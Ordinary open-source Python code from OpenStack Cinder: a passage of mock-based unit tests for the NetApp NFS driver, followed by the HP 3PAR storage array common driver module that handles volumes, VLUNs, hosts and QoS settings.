def test_copy_img_to_vol_copyoffload_success(self):
drv = self._driver
context = object()
volume = {'id': 'vol_id', 'name': 'name'}
image_service = object()
image_id = 'image_id'
drv._client = mock.Mock()
drv._client.get_api_version = mock.Mock(return_value=(1, 20))
drv._try_copyoffload = mock.Mock()
drv._get_provider_location = mock.Mock(return_value='share')
drv._get_vol_for_share = mock.Mock(return_value='vol')
drv._update_stale_vols = mock.Mock()
drv.copy_image_to_volume(context, volume, image_service, image_id)
drv._try_copyoffload.assert_called_once_with(context, volume,
image_service,
image_id)
drv._update_stale_vols.assert_called_once_with('vol')
def test_copy_img_to_vol_copyoffload_failure(self):
drv = self._driver
context = object()
volume = {'id': 'vol_id', 'name': 'name'}
image_service = object()
image_id = 'image_id'
drv._client = mock.Mock()
drv._client.get_api_version = mock.Mock(return_value=(1, 20))
drv._try_copyoffload = mock.Mock(side_effect=Exception())
netapp_nfs.NetAppNFSDriver.copy_image_to_volume = mock.Mock()
drv._get_provider_location = mock.Mock(return_value='share')
drv._get_vol_for_share = mock.Mock(return_value='vol')
drv._update_stale_vols = mock.Mock()
drv.copy_image_to_volume(context, volume, image_service, image_id)
drv._try_copyoffload.assert_called_once_with(context, volume,
image_service,
image_id)
netapp_nfs.NetAppNFSDriver.copy_image_to_volume.\
assert_called_once_with(context, volume, image_service, image_id)
drv._update_stale_vols.assert_called_once_with('vol')
def test_copy_img_to_vol_copyoffload_nonexistent_binary_path(self):
drv = self._driver
context = object()
volume = {'id': 'vol_id', 'name': 'name'}
image_service = mock.Mock()
image_service.get_location.return_value = (mock.Mock(), mock.Mock())
image_service.show.return_value = {'size': 0}
image_id = 'image_id'
drv._client = mock.Mock()
drv._client.get_api_version = mock.Mock(return_value=(1, 20))
drv._find_image_in_cache = mock.Mock(return_value=[])
drv._construct_image_nfs_url = mock.Mock(return_value="")
drv._check_get_nfs_path_segs = mock.Mock(return_value=("test:test",
"dr"))
drv._get_ip_verify_on_cluster = mock.Mock(return_value="192.1268.1.1")
drv._get_mount_point_for_share = mock.Mock(return_value='mnt_point')
drv._get_host_ip = mock.Mock()
drv._get_provider_location = mock.Mock()
drv._get_export_path = mock.Mock(return_value="dr")
drv._check_share_can_hold_size = mock.Mock()
# Raise error as if the copyoffload file can not be found
drv._clone_file_dst_exists = mock.Mock(side_effect=OSError())
# Verify the original error is propagated
self.assertRaises(OSError, drv._try_copyoffload,
context, volume, image_service, image_id)
def test_copyoffload_frm_cache_success(self):
drv = self._driver
context = object()
volume = {'id': 'vol_id', 'name': 'name'}
image_service = object()
image_id = 'image_id'
drv._find_image_in_cache = mock.Mock(return_value=[('share', 'img')])
drv._copy_from_cache = mock.Mock(return_value=True)
drv._try_copyoffload(context, volume, image_service, image_id)
drv._copy_from_cache.assert_called_once_with(volume,
image_id,
[('share', 'img')])
def test_copyoffload_frm_img_service_success(self):
drv = self._driver
context = object()
volume = {'id': 'vol_id', 'name': 'name'}
image_service = object()
image_id = 'image_id'
drv._client = mock.Mock()
drv._client.get_api_version = mock.Mock(return_value=(1, 20))
drv._find_image_in_cache = mock.Mock(return_value=[])
drv._copy_from_img_service = mock.Mock()
drv._try_copyoffload(context, volume, image_service, image_id)
drv._copy_from_img_service.assert_called_once_with(context,
volume,
image_service,
image_id)
def test_cache_copyoffload_workflow_success(self):
drv = self._driver
volume = {'id': 'vol_id', 'name': 'name', 'size': 1}
image_id = 'image_id'
cache_result = [('ip1:/openstack', 'img-cache-imgid')]
drv._get_ip_verify_on_cluster = mock.Mock(return_value='ip1')
drv._get_host_ip = mock.Mock(return_value='ip2')
drv._get_export_path = mock.Mock(return_value='/exp_path')
drv._execute = mock.Mock()
drv._register_image_in_cache = mock.Mock()
drv._get_provider_location = mock.Mock(return_value='/share')
drv._post_clone_image = mock.Mock()
copied = drv._copy_from_cache(volume, image_id, cache_result)
self.assertTrue(copied)
drv._get_ip_verify_on_cluster.assert_any_call('ip1')
drv._get_export_path.assert_called_with('vol_id')
drv._execute.assert_called_once_with('cof_path', 'ip1', 'ip1',
'/openstack/img-cache-imgid',
'/exp_path/name',
run_as_root=False,
check_exit_code=0)
drv._post_clone_image.assert_called_with(volume)
drv._get_provider_location.assert_called_with('vol_id')
@mock.patch.object(image_utils, 'qemu_img_info')
def test_img_service_raw_copyoffload_workflow_success(self,
mock_qemu_img_info):
drv = self._driver
volume = {'id': 'vol_id', 'name': 'name', 'size': 1}
image_id = 'image_id'
context = object()
image_service = mock.Mock()
image_service.get_location.return_value = ('nfs://ip1/openstack/img',
None)
image_service.show.return_value = {'size': 1,
'disk_format': 'raw'}
drv._check_get_nfs_path_segs = mock.Mock(return_value=
('ip1', '/openstack'))
drv._get_ip_verify_on_cluster = mock.Mock(return_value='ip1')
drv._get_host_ip = mock.Mock(return_value='ip2')
drv._get_export_path = mock.Mock(return_value='/exp_path')
drv._get_provider_location = mock.Mock(return_value='share')
drv._execute = mock.Mock()
drv._get_mount_point_for_share = mock.Mock(return_value='mnt_point')
drv._discover_file_till_timeout = mock.Mock(return_value=True)
img_inf = mock.Mock()
img_inf.file_format = 'raw'
mock_qemu_img_info.return_value = img_inf
drv._check_share_can_hold_size = mock.Mock()
drv._move_nfs_file = mock.Mock(return_value=True)
drv._delete_file = mock.Mock()
drv._clone_file_dst_exists = mock.Mock()
drv._post_clone_image = mock.Mock()
drv._copy_from_img_service(context, volume, image_service, image_id)
drv._get_ip_verify_on_cluster.assert_any_call('ip1')
drv._get_export_path.assert_called_with('vol_id')
drv._check_share_can_hold_size.assert_called_with('share', 1)
assert drv._execute.call_count == 1
drv._post_clone_image.assert_called_with(volume)
@mock.patch.object(image_utils, 'convert_image')
@mock.patch.object(image_utils, 'qemu_img_info')
@mock.patch('os.path.exists')
def test_img_service_qcow2_copyoffload_workflow_success(self, mock_exists,
mock_qemu_img_info,
mock_cvrt_image):
drv = self._driver
volume = {'id': 'vol_id', 'name': 'name', 'size': 1}
image_id = 'image_id'
context = object()
image_service = mock.Mock()
image_service.get_location.return_value = ('nfs://ip1/openstack/img',
None)
image_service.show.return_value = {'size': 1,
'disk_format': 'qcow2'}
drv._check_get_nfs_path_segs = mock.Mock(return_value=
('ip1', '/openstack'))
drv._get_ip_verify_on_cluster = mock.Mock(return_value='ip1')
drv._get_host_ip = mock.Mock(return_value='ip2')
drv._get_export_path = mock.Mock(return_value='/exp_path')
drv._get_provider_location = mock.Mock(return_value='share')
drv._execute = mock.Mock()
drv._get_mount_point_for_share = mock.Mock(return_value='mnt_point')
img_inf = mock.Mock()
img_inf.file_format = 'raw'
mock_qemu_img_info.return_value = img_inf
drv._check_share_can_hold_size = mock.Mock()
drv._move_nfs_file = mock.Mock(return_value=True)
drv._delete_file = mock.Mock()
drv._clone_file_dst_exists = mock.Mock()
drv._post_clone_image = mock.Mock()
drv._copy_from_img_service(context, volume, image_service, image_id)
drv._get_ip_verify_on_cluster.assert_any_call('ip1')
drv._get_export_path.assert_called_with('vol_id')
drv._check_share_can_hold_size.assert_called_with('share', 1)
assert mock_cvrt_image.call_count == 1
assert drv._execute.call_count == 1
assert drv._delete_file.call_count == 2
drv._clone_file_dst_exists.call_count == 1
drv._post_clone_image.assert_called_with(volume)
class NetappDirect7modeNfsDriverTestCase(NetappDirectCmodeNfsDriverTestCase):
"""Test direct NetApp C Mode driver."""
def _custom_setup(self):
self._driver = netapp_nfs.NetAppDirect7modeNfsDriver(
configuration=create_configuration())
def _prepare_delete_snapshot_mock(self, snapshot_exists):
drv = self._driver
mox = self.mox
mox.StubOutWithMock(drv, '_get_provider_location')
mox.StubOutWithMock(drv, '_volume_not_present')
if snapshot_exists:
mox.StubOutWithMock(drv, '_execute')
mox.StubOutWithMock(drv, '_get_volume_path')
drv._get_provider_location(IgnoreArg())
drv._volume_not_present(IgnoreArg(), IgnoreArg())\
.AndReturn(not snapshot_exists)
if snapshot_exists:
drv._get_volume_path(IgnoreArg(), IgnoreArg())
drv._execute('rm', None, run_as_root=True)
mox.ReplayAll()
return mox
def test_check_for_setup_error_version(self):
drv = self._driver
drv._client = api.NaServer("127.0.0.1")
# check exception raises when version not found
self.assertRaises(exception.VolumeBackendAPIException,
drv.check_for_setup_error)
drv._client.set_api_version(1, 8)
# check exception raises when not supported version
self.assertRaises(exception.VolumeBackendAPIException,
drv.check_for_setup_error)
def test_check_for_setup_error(self):
mox = self.mox
drv = self._driver
drv._client = api.NaServer("127.0.0.1")
drv._client.set_api_version(1, 9)
required_flags = [
'netapp_transport_type',
'netapp_login',
'netapp_password',
'netapp_server_hostname',
'netapp_server_port']
# set required flags
for flag in required_flags:
setattr(drv.configuration, flag, None)
# check exception raises when flags are not set
self.assertRaises(exception.CinderException,
drv.check_for_setup_error)
# set required flags
for flag in required_flags:
setattr(drv.configuration, flag, 'val')
mox.ReplayAll()
drv.check_for_setup_error()
mox.VerifyAll()
# restore initial FLAGS
for flag in required_flags:
delattr(drv.configuration, flag)
def test_do_setup(self):
mox = self.mox
drv = self._driver
mox.StubOutWithMock(netapp_nfs.NetAppNFSDriver, 'do_setup')
mox.StubOutWithMock(drv, '_get_client')
mox.StubOutWithMock(drv, '_do_custom_setup')
netapp_nfs.NetAppNFSDriver.do_setup(IgnoreArg())
drv._get_client()
drv._do_custom_setup(IgnoreArg())
mox.ReplayAll()
drv.do_setup(IsA(context.RequestContext))
mox.VerifyAll()
def _prepare_clone_mock(self, status):
drv = self._driver
mox = self.mox
volume = FakeVolume()
setattr(volume, 'provider_location', '127.0.0.1:/nfs')
mox.StubOutWithMock(drv, '_get_export_ip_path')
mox.StubOutWithMock(drv, '_get_actual_path_for_export')
mox.StubOutWithMock(drv, '_start_clone')
mox.StubOutWithMock(drv, '_wait_for_clone_finish')
if status == 'fail':
mox.StubOutWithMock(drv, '_clear_clone')
drv._get_export_ip_path(
IgnoreArg(), IgnoreArg()).AndReturn(('127.0.0.1', '/nfs'))
drv._get_actual_path_for_export(IgnoreArg()).AndReturn('/vol/vol1/nfs')
drv._start_clone(IgnoreArg(), IgnoreArg()).AndReturn(('1', '2'))
if status == 'fail':
drv._wait_for_clone_finish('1', '2').AndRaise(
api.NaApiError('error', 'error'))
drv._clear_clone('1')
else:
drv._wait_for_clone_finish('1', '2')
return mox
def test_clone_volume_clear(self):
drv = self._driver
mox = self._prepare_clone_mock('fail')
mox.ReplayAll()
volume_name = 'volume_name'
clone_name = 'clone_name'
volume_id = volume_name + str(hash(volume_name))
try:
drv._clone_volume(volume_name, clone_name, volume_id)
except Exception as e:
if isinstance(e, api.NaApiError):
pass
else:
raise
mox.VerifyAll()
|
adelina-t/cinder | cinder/volume/drivers/san/hp/hp_3par_common.py | # (c) Copyright 2012-2014 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
Volume driver common utilities for HP 3PAR Storage array
The 3PAR drivers requires 3.1.3 firmware on the 3PAR array.
You will need to install the python hp3parclient.
sudo pip install hp3parclient
The drivers uses both the REST service and the SSH
command line to correctly operate. Since the
ssh credentials and the REST credentials can be different
we need to have settings for both.
The drivers requires the use of the san_ip, san_login,
san_password settings for ssh connections into the 3PAR
array. It also requires the setting of
hp3par_api_url, hp3par_username, hp3par_password
for credentials to talk to the REST service on the 3PAR
array.
"""
import ast
import base64
import json
import math
import pprint
import re
import uuid
from cinder.openstack.common import importutils
hp3parclient = importutils.try_import("hp3parclient")
if hp3parclient:
from hp3parclient import client
from hp3parclient import exceptions as hpexceptions
from oslo.config import cfg
from cinder import context
from cinder import exception
from cinder.openstack.common import excutils
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
from cinder.openstack.common import loopingcall
from cinder.openstack.common import units
from cinder.volume import qos_specs
from cinder.volume import volume_types
LOG = logging.getLogger(__name__)
MIN_CLIENT_VERSION = '3.0.0'
hp3par_opts = [
cfg.StrOpt('hp3par_api_url',
default='',
help="3PAR WSAPI Server Url like "
"https://<3par ip>:8080/api/v1"),
cfg.StrOpt('hp3par_username',
default='',
help="3PAR Super user username"),
cfg.StrOpt('hp3par_password',
default='',
help="3PAR Super user password",
secret=True),
cfg.StrOpt('hp3par_cpg',
default="OpenStack",
help="The CPG to use for volume creation"),
cfg.StrOpt('hp3par_cpg_snap',
default="",
help="The CPG to use for Snapshots for volumes. "
"If empty hp3par_cpg will be used"),
cfg.StrOpt('hp3par_snapshot_retention',
default="",
help="The time in hours to retain a snapshot. "
"You can't delete it before this expires."),
cfg.StrOpt('hp3par_snapshot_expiration',
default="",
help="The time in hours when a snapshot expires "
" and is deleted. This must be larger than expiration"),
cfg.BoolOpt('hp3par_debug',
default=False,
help="Enable HTTP debugging to 3PAR"),
cfg.ListOpt('hp3par_iscsi_ips',
default=[],
help="List of target iSCSI addresses to use.")
]
CONF = cfg.CONF
CONF.register_opts(hp3par_opts)
class HP3PARCommon(object):
"""Class that contains common code for the 3PAR drivers.
Version history:
1.2.0 - Updated hp3parclient API use to 2.0.x
1.2.1 - Check that the VVS exists
1.2.2 - log prior to raising exceptions
1.2.3 - Methods to update key/value pair bug #1258033
1.2.4 - Remove deprecated config option hp3par_domain
1.2.5 - Raise Ex when deleting snapshot with dependencies bug #1250249
1.2.6 - Allow optional specifying n:s:p for vlun creation bug #1269515
This update now requires 3.1.2 MU3 firmware
1.3.0 - Removed all SSH code. We rely on the hp3parclient now.
2.0.0 - Update hp3parclient API uses 3.0.x
2.0.1 - Updated to use qos_specs, added new qos settings and personas
2.0.2 - Add back-end assisted volume migrate
2.0.3 - Allow deleting missing snapshots bug #1283233
2.0.4 - Allow volumes created from snapshots to be larger bug #1279478
2.0.5 - Fix extend volume units bug #1284368
2.0.6 - use loopingcall.wait instead of time.sleep
2.0.7 - Allow extend volume based on snapshot bug #1285906
2.0.8 - Fix detach issue for multiple hosts bug #1288927
2.0.9 - Remove unused 3PAR driver method bug #1310807
2.0.10 - Fixed an issue with 3PAR vlun location bug #1315542
2.0.11 - Remove hp3parclient requirement from unit tests #1315195
2.0.12 - Volume detach hangs when host is in a host set bug #1317134
2.0.13 - Added support for managing/unmanaging of volumes
"""
VERSION = "2.0.13"
stats = {}
# TODO(Ramy): move these to the 3PAR Client
VLUN_TYPE_EMPTY = 1
VLUN_TYPE_PORT = 2
VLUN_TYPE_HOST = 3
VLUN_TYPE_MATCHED_SET = 4
VLUN_TYPE_HOST_SET = 5
# Valid values for volume type extra specs
# The first value in the list is the default value
valid_prov_values = ['thin', 'full']
valid_persona_values = ['1 - Generic',
'2 - Generic-ALUA',
'6 - Generic-legacy',
'7 - HPUX-legacy',
'8 - AIX-legacy',
'9 - EGENERA',
'10 - ONTAP-legacy',
'11 - VMware',
'12 - OpenVMS',
'13 - HPUX',
'15 - WindowsServer']
hp_qos_keys = ['minIOPS', 'maxIOPS', 'minBWS', 'maxBWS', 'latency',
'priority']
qos_priority_level = {'low': 1, 'normal': 2, 'high': 3}
hp3par_valid_keys = ['cpg', 'snap_cpg', 'provisioning', 'persona', 'vvs']
def __init__(self, config):
self.config = config
self.hosts_naming_dict = dict()
self.client = None
def get_version(self):
return self.VERSION
def check_flags(self, options, required_flags):
for flag in required_flags:
if not getattr(options, flag, None):
msg = _('%s is not set') % flag
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
def _create_client(self):
cl = client.HP3ParClient(self.config.hp3par_api_url)
client_version = hp3parclient.version
if (client_version < MIN_CLIENT_VERSION):
ex_msg = (_('Invalid hp3parclient version found (%(found)s). '
'Version %(minimum)s or greater required.')
% {'found': client_version,
'minimum': MIN_CLIENT_VERSION})
LOG.error(ex_msg)
raise exception.InvalidInput(reason=ex_msg)
cl.setSSHOptions(self.config.san_ip,
self.config.san_login,
self.config.san_password,
port=self.config.san_ssh_port,
conn_timeout=self.config.ssh_conn_timeout,
privatekey=self.config.san_private_key)
return cl
def client_login(self):
try:
LOG.debug("Connecting to 3PAR")
self.client.login(self.config.hp3par_username,
self.config.hp3par_password)
except hpexceptions.HTTPUnauthorized as ex:
msg = (_("Failed to Login to 3PAR (%(url)s) because %(err)s") %
{'url': self.config.hp3par_api_url, 'err': ex})
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
def client_logout(self):
self.client.logout()
LOG.debug("Disconnect from 3PAR")
def do_setup(self, context):
if hp3parclient is None:
msg = _('You must install hp3parclient before using 3PAR drivers.')
raise exception.VolumeBackendAPIException(data=msg)
try:
self.client = self._create_client()
except hpexceptions.UnsupportedVersion as ex:
raise exception.InvalidInput(ex)
LOG.info(_("HP3PARCommon %(common_ver)s, hp3parclient %(rest_ver)s")
% {"common_ver": self.VERSION,
"rest_ver": hp3parclient.get_version_string()})
if self.config.hp3par_debug:
self.client.debug_rest(True)
self.client_login()
try:
# make sure the default CPG exists
self.validate_cpg(self.config.hp3par_cpg)
finally:
self.client_logout()
def validate_cpg(self, cpg_name):
try:
self.client.getCPG(cpg_name)
except hpexceptions.HTTPNotFound:
err = (_("CPG (%s) doesn't exist on array") % cpg_name)
LOG.error(err)
raise exception.InvalidInput(reason=err)
def get_domain(self, cpg_name):
try:
cpg = self.client.getCPG(cpg_name)
except hpexceptions.HTTPNotFound:
err = (_("Failed to get domain because CPG (%s) doesn't "
"exist on array.") % cpg_name)
LOG.error(err)
raise exception.InvalidInput(reason=err)
if 'domain' in cpg:
return cpg['domain']
return None
def extend_volume(self, volume, new_size):
volume_name = self._get_3par_vol_name(volume['id'])
old_size = volume['size']
growth_size = int(new_size) - old_size
LOG.debug("Extending Volume %(vol)s from %(old)s to %(new)s, "
" by %(diff)s GB." %
{'vol': volume_name, 'old': old_size, 'new': new_size,
'diff': growth_size})
growth_size_mib = growth_size * units.Ki
self._extend_volume(volume, volume_name, growth_size_mib)
def manage_existing(self, volume, existing_ref):
"""Manage an existing 3PAR volume."""
# Check for the existence of the virtual volume.
try:
vol = self.client.getVolume(existing_ref['name'])
except hpexceptions.HTTPNotFound:
err = (_("Virtual volume '%s' doesn't exist on array.") %
existing_ref['name'])
LOG.error(err)
raise exception.InvalidInput(reason=err)
new_comment = {}
# Use the display name from the existing volume if no new name
# was chosen by the user.
if volume['display_name']:
display_name = volume['display_name']
new_comment['display_name'] = volume['display_name']
elif 'comment' in vol:
display_name = self._get_3par_vol_comment_value(vol['comment'],
'display_name')
if display_name:
new_comment['display_name'] = display_name
else:
display_name = None
# Generate the new volume information based off of the new ID.
new_vol_name = self._get_3par_vol_name(volume['id'])
name = 'volume-' + volume['id']
new_comment['volume_id'] = volume['id']
new_comment['name'] = name
new_comment['type'] = 'OpenStack'
# Create new comments for the existing volume depending on
# whether the user's volume type choice.
# TODO(Anthony) when retype is available handle retyping of
# a volume.
if volume['volume_type']:
try:
settings = self.get_volume_settings_from_type(volume)
except Exception:
reason = (_("Volume type ID '%s' is invalid.") %
volume['volume_type_id'])
raise exception.ManageExistingVolumeTypeMismatch(reason=reason)
volume_type = self._get_volume_type(volume['volume_type_id'])
new_comment['volume_type_name'] = volume_type['name']
new_comment['volume_type_id'] = volume['volume_type_id']
new_comment['qos'] = settings['qos']
# Update the existing volume with the new name and comments.
self.client.modifyVolume(existing_ref['name'],
{'newName': new_vol_name,
'comment': json.dumps(new_comment)})
LOG.info(_("Virtual volume '%(ref)s' renamed to '%(new)s'.") %
{'ref': existing_ref['name'], 'new': new_vol_name})
LOG.info(_("Virtual volume %(disp)s '%(new)s' is now being managed.") %
{'disp': display_name, 'new': new_vol_name})
# Return display name to update the name displayed in the GUI.
return {'display_name': display_name}
def manage_existing_get_size(self, volume, existing_ref):
"""Return size of volume to be managed by manage_existing.
existing_ref is a dictionary of the form:
{'name': <name of the virtual volume>}
"""
# Check that a valid reference was provided.
if 'name' not in existing_ref:
reason = _("Reference must contain name element.")
raise exception.ManageExistingInvalidReference(
existing_ref=existing_ref,
reason=reason)
# Make sure the reference is not in use.
if re.match('osv-*|oss-*|vvs-*', existing_ref['name']):
reason = _("Reference must be for an unmanaged virtual volume.")
raise exception.ManageExistingInvalidReference(
existing_ref=existing_ref,
reason=reason)
# Check for the existence of the virtual volume.
try:
vol = self.client.getVolume(existing_ref['name'])
except hpexceptions.HTTPNotFound:
err = (_("Virtual volume '%s' doesn't exist on array.") %
existing_ref['name'])
LOG.error(err)
raise exception.InvalidInput(reason=err)
return int(math.ceil(float(vol['sizeMiB']) / units.Ki))
def unmanage(self, volume):
"""Removes the specified volume from Cinder management."""
# Rename the volume's name to unm-* format so that it can be
# easily found later.
vol_name = self._get_3par_vol_name(volume['id'])
new_vol_name = self._get_3par_unm_name(volume['id'])
self.client.modifyVolume(vol_name, {'newName': new_vol_name})
LOG.info(_("Virtual volume %(disp)s '%(vol)s' is no longer managed. "
"Volume renamed to '%(new)s'.") %
{'disp': volume['display_name'],
'vol': vol_name,
'new': new_vol_name})
def _extend_volume(self, volume, volume_name, growth_size_mib,
_convert_to_base=False):
try:
if _convert_to_base:
LOG.debug("Converting to base volume prior to growing.")
self._convert_to_base_volume(volume)
self.client.growVolume(volume_name, growth_size_mib)
except Exception as ex:
with excutils.save_and_reraise_exception() as ex_ctxt:
if (not _convert_to_base and
isinstance(ex, hpexceptions.HTTPForbidden) and
ex.get_code() == 150):
# Error code 150 means 'invalid operation: Cannot grow
# this type of volume'.
# Suppress raising this exception because we can
# resolve it by converting it into a base volume.
# Afterwards, extending the volume should succeed, or
# fail with a different exception/error code.
ex_ctxt.reraise = False
self._extend_volume(volume, volume_name,
growth_size_mib,
_convert_to_base=True)
else:
LOG.error(_("Error extending volume: %(vol)s. "
"Exception: %(ex)s") %
{'vol': volume_name, 'ex': ex})
def _get_3par_vol_name(self, volume_id):
"""Get converted 3PAR volume name.
Converts the openstack volume id from
ecffc30f-98cb-4cf5-85ee-d7309cc17cd2
to
osv-7P.DD5jLTPWF7tcwnMF80g
We convert the 128 bits of the uuid into a 24character long
base64 encoded string to ensure we don't exceed the maximum
allowed 31 character name limit on 3Par
We strip the padding '=' and replace + with .
and / with -
"""
volume_name = self._encode_name(volume_id)
return "osv-%s" % volume_name
def _get_3par_snap_name(self, snapshot_id):
snapshot_name = self._encode_name(snapshot_id)
return "oss-%s" % snapshot_name
def _get_3par_vvs_name(self, volume_id):
vvs_name = self._encode_name(volume_id)
return "vvs-%s" % vvs_name
def _get_3par_unm_name(self, volume_id):
unm_name = self._encode_name(volume_id)
return "unm-%s" % unm_name
def _encode_name(self, name):
uuid_str = name.replace("-", "")
vol_uuid = uuid.UUID('urn:uuid:%s' % uuid_str)
vol_encoded = base64.b64encode(vol_uuid.bytes)
# 3par doesn't allow +, nor /
vol_encoded = vol_encoded.replace('+', '.')
vol_encoded = vol_encoded.replace('/', '-')
# strip off the == as 3par doesn't like those.
vol_encoded = vol_encoded.replace('=', '')
return vol_encoded
def _capacity_from_size(self, vol_size):
# because 3PAR volume sizes are in
# Mebibytes, Gigibytes, not Megabytes.
MB = 1000L
MiB = 1.048576
if int(vol_size) == 0:
capacity = MB # default: 1GB
else:
capacity = vol_size * MB
capacity = int(round(capacity / MiB))
return capacity
def _delete_3par_host(self, hostname):
self.client.deleteHost(hostname)
def _create_3par_vlun(self, volume, hostname, nsp):
try:
location = None
if nsp is None:
location = self.client.createVLUN(volume, hostname=hostname,
auto=True)
else:
port = self.build_portPos(nsp)
location = self.client.createVLUN(volume, hostname=hostname,
auto=True, portPos=port)
vlun_info = None
if location:
# The LUN id is returned as part of the location URI
vlun = location.split(',')
vlun_info = {'volume_name': vlun[0],
'lun_id': int(vlun[1]),
'host_name': vlun[2],
}
if len(vlun) > 3:
vlun_info['nsp'] = vlun[3]
return vlun_info
except hpexceptions.HTTPBadRequest as e:
if 'must be in the same domain' in e.get_description():
LOG.error(e.get_description())
raise exception.Invalid3PARDomain(err=e.get_description())
def _safe_hostname(self, hostname):
"""We have to use a safe hostname length for 3PAR host names."""
try:
index = hostname.index('.')
except ValueError:
# couldn't find it
index = len(hostname)
# we'll just chop this off for now.
if index > 23:
index = 23
return hostname[:index]
def _get_3par_host(self, hostname):
return self.client.getHost(hostname)
def get_ports(self):
return self.client.getPorts()
def get_active_target_ports(self):
ports = self.get_ports()
target_ports = []
for port in ports['members']:
if (
port['mode'] == self.client.PORT_MODE_TARGET and
port['linkState'] == self.client.PORT_STATE_READY
):
port['nsp'] = self.build_nsp(port['portPos'])
target_ports.append(port)
return target_ports
def get_active_fc_target_ports(self):
ports = self.get_active_target_ports()
fc_ports = []
for port in ports:
if port['protocol'] == self.client.PORT_PROTO_FC:
fc_ports.append(port)
return fc_ports
def get_active_iscsi_target_ports(self):
ports = self.get_active_target_ports()
iscsi_ports = []
for port in ports:
if port['protocol'] == self.client.PORT_PROTO_ISCSI:
iscsi_ports.append(port)
return iscsi_ports
def get_volume_stats(self, refresh):
if refresh:
self._update_volume_stats()
return self.stats
def _update_volume_stats(self):
# const to convert MiB to GB
const = 0.0009765625
# storage_protocol and volume_backend_name are
# set in the child classes
stats = {'driver_version': '1.0',
'free_capacity_gb': 'unknown',
'reserved_percentage': 0,
'storage_protocol': None,
'total_capacity_gb': 'unknown',
'QoS_support': True,
'vendor_name': 'Hewlett-Packard',
'volume_backend_name': None}
try:
cpg = self.client.getCPG(self.config.hp3par_cpg)
if 'limitMiB' not in cpg['SDGrowth']:
total_capacity = 'infinite'
free_capacity = 'infinite'
else:
total_capacity = int(cpg['SDGrowth']['limitMiB'] * const)
free_capacity = int((cpg['SDGrowth']['limitMiB'] -
cpg['UsrUsage']['usedMiB']) * const)
stats['total_capacity_gb'] = total_capacity
stats['free_capacity_gb'] = free_capacity
except hpexceptions.HTTPNotFound:
err = (_("CPG (%s) doesn't exist on array")
% self.config.hp3par_cpg)
LOG.error(err)
raise exception.InvalidInput(reason=err)
info = self.client.getStorageSystemInfo()
stats['location_info'] = ('HP3PARDriver:%(sys_id)s:%(dest_cpg)s' %
{'sys_id': info['serialNumber'],
'dest_cpg': self.config.safe_get(
'hp3par_cpg')})
self.stats = stats
def _get_vlun(self, volume_name, hostname, lun_id=None):
"""find a VLUN on a 3PAR host."""
vluns = self.client.getHostVLUNs(hostname)
found_vlun = None
for vlun in vluns:
if volume_name in vlun['volumeName']:
if lun_id:
if vlun['lun'] == lun_id:
found_vlun = vlun
break
else:
found_vlun = vlun
break
if found_vlun is None:
msg = (_("3PAR vlun %(name)s not found on host %(host)s") %
{'name': volume_name, 'host': hostname})
LOG.info(msg)
return found_vlun
def create_vlun(self, volume, host, nsp=None):
"""Create a VLUN.
In order to export a volume on a 3PAR box, we have to create a VLUN.
"""
volume_name = self._get_3par_vol_name(volume['id'])
vlun_info = self._create_3par_vlun(volume_name, host['name'], nsp)
return self._get_vlun(volume_name, host['name'], vlun_info['lun_id'])
def delete_vlun(self, volume, hostname):
volume_name = self._get_3par_vol_name(volume['id'])
vluns = self.client.getHostVLUNs(hostname)
for vlun in vluns:
if volume_name in vlun['volumeName']:
break
else:
msg = (
_("3PAR vlun for volume %(name)s not found on host %(host)s") %
{'name': volume_name, 'host': hostname})
LOG.info(msg)
return
# VLUN Type of MATCHED_SET 4 requires the port to be provided
if self.VLUN_TYPE_MATCHED_SET == vlun['type']:
self.client.deleteVLUN(volume_name, vlun['lun'], hostname,
vlun['portPos'])
else:
self.client.deleteVLUN(volume_name, vlun['lun'], hostname)
# Determine if there are other volumes attached to the host.
# This will determine whether we should try removing host from host set
# and deleting the host.
for vlun in vluns:
if volume_name not in vlun['volumeName']:
# Found another volume
break
else:
# We deleted the last vlun, so try to delete the host too.
# This check avoids the old unnecessary try/fail when vluns exist
# but adds a minor race condition if a vlun is manually deleted
# externally at precisely the wrong time. Worst case is leftover
# host, so it is worth the unlikely risk.
try:
self._delete_3par_host(hostname)
self._remove_hosts_naming_dict_host(hostname)
except Exception as ex:
# Any exception down here is only logged. The vlun is deleted.
# If the host is in a host set, the delete host will fail and
# the host will remain in the host set. This is desired
# because cinder was not responsible for the host set
# assignment. The host set could be used outside of cinder
# for future needs (e.g. export volume to host set).
# The log info explains why the host was left alone.
msg = (_("3PAR vlun for volume '%(name)s' was deleted, "
"but the host '%(host)s' was not deleted because: "
"%(reason)s") %
{'name': volume_name,
'host': hostname,
'reason': ex.get_description()})
LOG.info(msg)
def _remove_hosts_naming_dict_host(self, hostname):
items = self.hosts_naming_dict.items()
lkey = None
for key, value in items:
if value == hostname:
lkey = key
if lkey is not None:
del self.hosts_naming_dict[lkey]
def _get_volume_type(self, type_id):
ctxt = context.get_admin_context()
return volume_types.get_volume_type(ctxt, type_id)
def _get_key_value(self, hp3par_keys, key, default=None):
if hp3par_keys is not None and key in hp3par_keys:
return hp3par_keys[key]
else:
return default
def _get_qos_value(self, qos, key, default=None):
if key in qos:
return qos[key]
else:
return default
def _get_qos_by_volume_type(self, volume_type):
qos = {}
qos_specs_id = volume_type.get('qos_specs_id')
specs = volume_type.get('extra_specs')
#NOTE(kmartin): We prefer the qos_specs association
# and override any existing extra-specs settings
# if present.
if qos_specs_id is not None:
kvs = qos_specs.get_qos_specs(context.get_admin_context(),
qos_specs_id)['specs']
else:
kvs = specs
for key, value in kvs.iteritems():
if 'qos:' in key:
fields = key.split(':')
key = fields[1]
if key in self.hp_qos_keys:
qos[key] = value
return qos
def _get_keys_by_volume_type(self, volume_type):
hp3par_keys = {}
specs = volume_type.get('extra_specs')
for key, value in specs.iteritems():
if ':' in key:
fields = key.split(':')
key = fields[1]
if key in self.hp3par_valid_keys:
hp3par_keys[key] = value
return hp3par_keys
